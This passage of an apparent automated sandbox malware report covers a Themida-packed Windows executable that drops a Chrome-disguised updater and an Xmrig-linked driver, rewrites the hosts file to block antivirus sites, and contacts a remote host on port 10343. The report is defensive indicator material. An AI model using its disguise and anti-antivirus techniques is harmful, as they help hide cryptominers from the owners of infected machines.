                    • 207.109.44.206
                    na.elfGet hashmaliciousMirai, OkiruBrowse
                    • 67.134.44.127
                    na.elfGet hashmaliciousMirai, OkiruBrowse
                    • 75.122.160.50
                    na.elfGet hashmaliciousMiraiBrowse
                    • 97.124.122.92
                    na.elfGet hashmaliciousMiraiBrowse
                    • 65.128.41.3
                    https://rondoc-b7ce.lvauayt.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                    • 162.19.58.159
                    https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                    • 162.19.58.157
                    na.elfGet hashmaliciousMiraiBrowse
                    • 67.134.44.140

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Windows\Temp\mnidgyzvuran.sysaA45th2ixY.exeGet hashmaliciousXmrigBrowse
                      1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                        updater.exeGet hashmaliciousXmrigBrowse
                          7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                            LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                SecuriteInfo.com.Win64.Evo-gen.13032.15171.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                    S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                      Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse

                                        Created / dropped Files

                                        C:\ProgramData\Google\Chrome\updater.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):8538008
                                        Entropy (8bit):7.9153349904935055
                                        Encrypted:false
                                        SSDEEP:196608:Y824DtCO9i9nwi6rEv5sv+1E5TOt8mua+Wnm3hsQGmGu0r8f6ha:YWhn9iGvTvcE8t8mMWn+7gh
                                        MD5:DBF8D8EF015846D4078466A7C1D3F41C
                                        SHA1:67D156457E6028ADDC00CDD3A2E595D7C7A00466
                                        SHA-256:D50ECB2FA3AFEE2D23F9F952201E01898E191E9D475F44BC1C146C49C4EFE4BB
                                        SHA-512:21D65ED89FCE09FD847F39BF7AC5D058521276F65A770B51B1F7E87B86C7A815BCAA58CA1B5474F05B0E3DE55D28923273E1E8C6FF1509B5748C1C247978218B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 55%
                                        • Antivirus: Virustotal, Detection: 46%, Browse
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........l.....p..........@....................................Z....`.................................................B0n.d....Pn.H....3..............................................(@n.(................................................... &........o.................. ..` .*... ..C....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m......0R.............@..@ ......n......2R.............@... P.....n.n....4R.............@..@ x.... n.i....6R.............@..B.imports.....0n......8R.............@....tls.........@n......:R..................rsrc........Pn......<R.............@..@.themida.`T..`n......@R.............`....boot...../......./..@R.............`..`.reloc.................................@........................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulJnp/p:NllU
                                        MD5:BC6DB77EB243BF62DC31267706650173
                                        SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                        SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                        SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                        Malicious:false
                                        Preview:@...e.................................X..............@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dlabkv3.k15.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bno5m1rc.e3z.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnjqdz52.4gw.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhock3g5.mv0.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1510207563435464
                                        Encrypted:false
                                        SSDEEP:3:NlllulvX/Z:NllUvX
                                        MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                        SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                        SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                        SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                        Malicious:false
                                        Preview:@...e................................................@..........

                                        C:\Windows\System32\drivers\etc\hosts

                                        Download File
                                        Process:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2748
                                        Entropy (8bit):4.269302338623222
                                        Encrypted:false
                                        SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                        MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                        SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                        SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                        SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                        C:\Windows\Temp\__PSScriptPolicyTest_ftoykijx.mdk.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_u2zbqt4a.veq.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_vdzhsi1o.bak.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_xfvot4ly.d1u.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\mnidgyzvuran.sys

                                        Download File
                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):14544
                                        Entropy (8bit):6.2660301556221185
                                        Encrypted:false
                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                        Joe Sandbox View:
                                        • Filename: aA45th2ixY.exe, Detection: malicious, Browse
                                        • Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
                                        • Filename: updater.exe, Detection: malicious, Browse
                                        • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                        • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: S0FTWARE.exe, Detection: malicious, Browse
                                        • Filename: Gw2G72kSsY.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):7.9153349904935055
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:TwrhjEKqxk.exe
                                        File size:8'538'008 bytes
                                        MD5:dbf8d8ef015846d4078466a7c1d3f41c
                                        SHA1:67d156457e6028addc00cdd3a2e595d7c7a00466
                                        SHA256:d50ecb2fa3afee2d23f9f952201e01898e191e9d475f44bc1c146c49c4efe4bb
                                        SHA512:21d65ed89fce09fd847f39bf7ac5d058521276f65a770b51b1f7e87b86c7a815bcaa58ca1b5474f05b0e3de55d28923273e1e8c6ff1509b5748c1c247978218b
                                        SSDEEP:196608:Y824DtCO9i9nwi6rEv5sv+1E5TOt8mua+Wnm3hsQGmGu0r8f6ha:YWhn9iGvTvcE8t8mMWn+7gh
                                        TLSH:0F863340EFE9B8CFE3C97CB99707381D8A58B76901E55C91B04F9A0D258368534EBAD3
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........l.....p..........@....................................Z.....`........................................

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x140c2c370
                                        Entrypoint Section:.boot
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66FED9FB [Thu Oct 3 17:52:59 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:35a81d16af9f2ba6d515f11152d0364b

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F9DE50BA827h
                                        inc ecx
                                        push edx
                                        dec ecx
                                        mov edx, esp
                                        inc ecx
                                        push edx
                                        dec ecx
                                        mov esi, dword ptr [edx+10h]
                                        dec ecx
                                        mov edi, dword ptr [edx+20h]
                                        cld
                                        mov dl, 80h
                                        mov al, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        mov byte ptr [edi], al
                                        dec eax
                                        inc edi
                                        mov ebx, 00000002h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA686h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA700h
                                        xor eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jnc 00007F9DE50BA7A8h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        je 00007F9DE50BA6ABh
                                        push edi
                                        mov eax, eax
                                        dec eax
                                        sub edi, eax
                                        mov al, byte ptr [edi]
                                        pop edi
                                        mov byte ptr [edi], al
                                        dec eax
                                        inc edi
                                        mov ebx, 00000002h
                                        jmp 00007F9DE50BA62Ah
                                        mov eax, 00000001h
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        adc eax, eax
                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jc 00007F9DE50BA688h
                                        sub eax, ebx
                                        mov ebx, 00000001h
                                        jne 00007F9DE50BA6D0h
                                        mov ecx, 00000001h

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6e30420x64.imports
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e50000x348.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xc033fc0x1a4.themida
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf280000x10.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x6e40280x28.tls
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x10e260x6f06193682cf8d1f654e26b4e7026b469de4False0.9915558370276546data7.964649025796498IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        0x120000x2a8c0x1343b0ca2516155ce5df53c8905204f930f6False1.002230784830663data7.933205349560523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        0x150000x6c83200x51a52e55c2a574d6ffe337513b87003d3237e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x6de0000x1980x10ab2f1c06c53a30dfd848ee5d9d8eb80baFalse1.0413533834586466data6.8916988852955265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        0x6df0000x100x101edd6d692b86dc07ee12c671511bb427False1.5625data3.875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        0x6e00000x100x66ae543a2e002aa7d52a01df5103e1a79False2.3333333333333335data2.584962500721156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x6e10000x3500x16e72af9ed5ebb806bedf8a93610402cff0False1.030054644808743data7.375743137600779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        0x6e20000x780x696f69df47a858ad1dd662ba719ee1981cFalse1.1047619047619048data6.080632898494871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .imports0x6e30000x10000x20046be7d863a64363f8b65a25ee833d78fFalse0.1796875data1.2657209021050075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .tls0x6e40000x10000x200ec0ffde6834be88667d15ede52ae8b07False0.060546875data0.31592487960959603IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x6e50000x10000x4002468ef38b7adebb983068c293c71e313False0.369140625data2.858717175514925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .themida0x6e60000x5460000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .boot0xc2c0000x2fbe000x2fbe0090b0753e2205263e70ed1e64b99cc640unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .reloc0xf280000x10000x10a2277de4b751aa34049f7464db99f5a7False1.5GLS_BINARY_LSB_FIRST2.6493974703476995IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x6e50580x2f0SysEx File - IDPEnglishUnited States0.45611702127659576

                                        Imports

                                        DLLImport
                                        kernel32.dllGetModuleHandleA
                                        msvcrt.dll__C_specific_handler

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 03:03:15.945435047 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:15.950362921 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:15.950462103 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:15.950812101 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:15.955735922 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.567229986 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.567286968 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.567388058 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:16.568572998 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:16.573395967 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.747874022 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.790287018 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:16.878185034 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:16.930913925 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:37.915859938 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:37.977787018 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:47.922754049 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:47.977777958 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:03:57.926666975 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:03:57.977771044 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:04:11.913234949 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:04:11.977864027 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:04:23.948406935 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:04:24.180918932 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:04:33.908154011 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:04:33.977845907 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:04:50.934618950 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:04:50.977921009 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:01.979237080 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:02.180965900 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:02.607872009 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:02.608201027 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:11.954598904 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:12.181022882 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:21.991960049 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:22.180954933 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:31.930351973 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:31.977863073 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:41.954196930 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:42.181122065 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:05:51.946712017 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:05:52.180942059 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:00.726299047 CEST4970410343192.168.2.5162.19.224.121
                                        Oct 7, 2024 03:06:00.731585979 CEST1034349704162.19.224.121192.168.2.5
                                        Oct 7, 2024 03:06:00.927501917 CEST1034349704162.19.224.121192.168.2.5
